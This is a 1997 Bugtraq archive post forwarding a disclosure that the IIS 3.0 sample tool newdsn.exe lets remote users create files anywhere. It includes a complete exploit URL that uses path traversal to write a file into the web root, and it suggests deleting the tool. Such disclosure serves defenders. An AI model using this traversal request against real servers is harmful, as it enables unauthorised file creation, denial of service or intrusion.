Bugtraq mailing list archives
samples from IIS allows creation of any file
From: aleph1 () DFW NET (Aleph One)
Date: Thu, 25 Sep 1997 15:20:13 -0500
---------- Forwarded message ---------- Date: Thu, 25 Sep 1997 16:15:14 +0300 From: Vytis Fedaravicius <vytix () FLOYD KTU LT> To: NTBUGTRAQ () NTADVICE COM Subject: samples from IIS allows creation of any file Hello, while playing with default installation of Microsoft IIS, I have discovered that tool for data source cration, newdsn.exe allows creation of *.mdb files with any name at any location. Eg. url http://vulnerable.site.com/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29er%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB&attr= will create file evil.html in wwwroot directory. evil.html in fact is a Microsoft Access Database. I am sure someone nasty can think of a DOS or even breaking in using this. Software: MS IIS 3.0 default installation on WinNT 4.0 server Solution: delete newdsn.exe :) Microsoft was not informed about that, if someone wants, please feel free to forward this e-mail. Vytis Fedaravicius
Current thread:
- samples from IIS allows creation of any file Aleph One (Sep 25)
- <Possible follow-ups>
- samples from IIS allows creation of any file root (Sep 25)